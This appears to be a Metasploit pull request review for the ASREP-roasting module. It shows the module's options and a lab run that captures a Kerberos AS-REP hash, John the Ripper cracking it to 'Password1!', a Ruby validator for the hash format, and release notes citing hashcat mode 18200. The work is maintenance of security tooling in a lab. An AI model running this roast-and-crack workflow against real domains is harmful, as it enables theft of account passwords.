Asrep update #20176
Changes are LGTM
```
msf6 auxiliary(gather/asrep) > show options

Module options (auxiliary/gather/asrep):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   Rhostname                      no        The domain controller's hostname
   SSL           false            no        Enable SSL on the LDAP connection
   Timeout       10               yes       The TCP timeout to establish Kerberos connection and read data
   USE_RC4_HMAC  true             yes       Request using RC4 hash instead of default encryption types (faster to crack)


   When ACTION is BRUTE_FORCE:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   USER_FILE                   no        File containing usernames, one per line


   Used when connecting to LDAP over an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.159.10   yes       The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LDAPDomain    msflab.local     no        The domain to authenticate to
   LDAPPassword  Password1!       no        The password to authenticate with
   LDAPUsername  smcintyre        no        The username to authenticate with
   RHOSTS        192.168.159.10   yes       The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         389              no        The target port


Auxiliary action:

   Name  Description
   ----  -----------
   LDAP  Ask a domain controller directly for the susceptible user accounts


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/asrep) > run
[*] Running module against 192.168.159.10
[email protected]:9b5ff52d7165247a9456718383cd203a$3ebfda868f95d0e7bd08352c7f07644c27976af40102729567d043acaaa15504127df8574e398cf5452b71b9cffc4624e2c070e10c44b29a63322a01fa700efef951c5f5141ca901ec280ec4e7398181ba4ea6e51582f101547b3542a53190063df0cacbdcb739288a0d5332f2f89b7f85811778c346d8ecadd9f66da5605ad46cdc58695ebde4a28715c80d23a8b7f96852daab795259b784976ef2025975578dc0d86566335712910fb9444697ce5857d4044c374c06ed76934dd4caa30fb4cacff3c61abe66c85247a21c4d4612e8a3c37a99645baca464a802fbe8
[+] Query returned 1 result.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > creds -t krb5asrep-rc4 -v
Credentials
===========

host            origin          service           public  private                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              realm  private_type        JtR Format     cracked_password
----            ------          -------           ------  -------                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -----  ------------        ----------     ----------------
192.168.159.10  192.168.159.10  389/tcp (Kerberos)         [email protected]:9b5ff52d7165247a9456718383cd203a$3ebfda868f95d0e7bd08352c7f07644c27976af40102729567d043acaaa15504127df8574e398cf5452b71b9cffc4624e2c070e10c44b29a63322a01fa700efef951c5f5141ca901ec280ec4e7398181ba4ea6e51582f101547b3542a53190063df0cacbdcb739288a0d5332f2f89b7f85811778c346d8ecadd9f66da5605ad46cdc58695ebde4a28715c80d23a8b7f96852daab795259b784976ef2025975578dc0d86566335712910fb9444697ce5857d4044c374c06ed76934dd4caa30fb4cacff3c61abe66c85247a21c4d4612e8a3c37a99645baca464a802fbe8         Nonreplayable hash  krb5asrep-rc4

msf6 auxiliary(gather/asrep) >
```
```
../john/run/john crackme.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Cost 1 (etype) is 23 for all loaded hashes
Will run 16 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:01 DONE 1/3 (2025-05-19 17:37) 0g/s 49091p/s 49091c/s 49091C/s Local1901..Lmsflab1900
Proceeding with wordlist:../john/run/password.lst
Enabling duplicate candidate password suppressor using 256 MiB
Password1!       ([email protected])
1g 0:00:00:01 DONE 2/3 (2025-05-19 17:37) 0.7463g/s 69514p/s 69514c/s 69514C/s worldwide..141185
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
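The creds entry above stores the AS-REP as a JtR `krb5asrep-rc4` string. As an added example (not code from this PR, from Metasploit or from metasploit-credential), this Ruby snippet parses and validates that string layout so a caller can refuse to store a malformed record; the principal, realm, checksum and ciphertext in the sample are constructed values.

```ruby
# Added example, not part of the Metasploit PR: parse and validate the
# JtR/hashcat krb5asrep string (hashcat mode 18200) that the creds table
# stores with private_type "Nonreplayable hash" and JtR format "krb5asrep-rc4".
#
# Layout: $krb5asrep$<etype>$<principal>@<REALM>:<checksum-hex>$<ciphertext-hex>
# For etype 23 (RC4-HMAC) the checksum is a 16-byte HMAC-MD5 (32 hex chars) and
# the ciphertext is the RC4-encrypted enc-part of the AS-REP.
ASREP_RE = /\A\$krb5asrep\$(?<etype>\d+)\$(?<principal>[^@:$]+)@(?<realm>[^:$]+):(?<checksum>\h+)\$(?<cipher>\h+)\z/
RC4_HMAC_ETYPE = 23
RC4_CHECKSUM_HEX_LEN = 32

# Returns a field hash for a well-formed RC4 AS-REP string, or nil when the
# string is malformed or uses an etype this validator does not handle.
def parse_asrep_hash(str)
  m = ASREP_RE.match(str.to_s.strip)
  return nil unless m
  etype = m[:etype].to_i
  return nil unless etype == RC4_HMAC_ETYPE
  return nil unless m[:checksum].length == RC4_CHECKSUM_HEX_LEN
  # ciphertext must be non-empty and a whole number of bytes
  return nil if m[:cipher].empty? || m[:cipher].length.odd?
  {
    etype: etype,
    principal: m[:principal],
    realm: m[:realm],
    checksum: m[:checksum].downcase,
    ciphertext_bytes: m[:cipher].length / 2
  }
end

# Maps a validated string onto the columns the creds listing shows.
def to_cred_fields(str)
  parsed = parse_asrep_hash(str)
  return nil unless parsed
  {
    username: parsed[:principal],
    realm: parsed[:realm],
    private_data: str.strip,
    private_type: 'Nonreplayable hash',
    jtr_format: 'krb5asrep-rc4'
  }
end

# Constructed sample (not the hash from the PR output): every field is made up.
SAMPLE_ASREP = '$krb5asrep$23$jdoe@MSFLAB.LOCAL:' + ('ab' * 16) + '$' + ('1f' * 40)

p to_cred_fields(SAMPLE_ASREP) if __FILE__ == $PROGRAM_NAME
```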
I pushed an update to bump metasploit-credential using `bundle update --conservative metasploit-credential`, which left nokogiri and other libraries at their current version. If the tests pass, I'll get this landed tomorrow.
Release Notes

This updates the ASREP roasting module (
This stores asrep "hashes" into the metasploit DB. Also utilises some of the shared code from #20175.
Requires rapid7/metasploit-credential#190.
Verification

- `creds -t krb5asrep-rc4`, and successfully crack (i.e. `hashcat -m 18200 asrep.hcat wordlist`)

Demo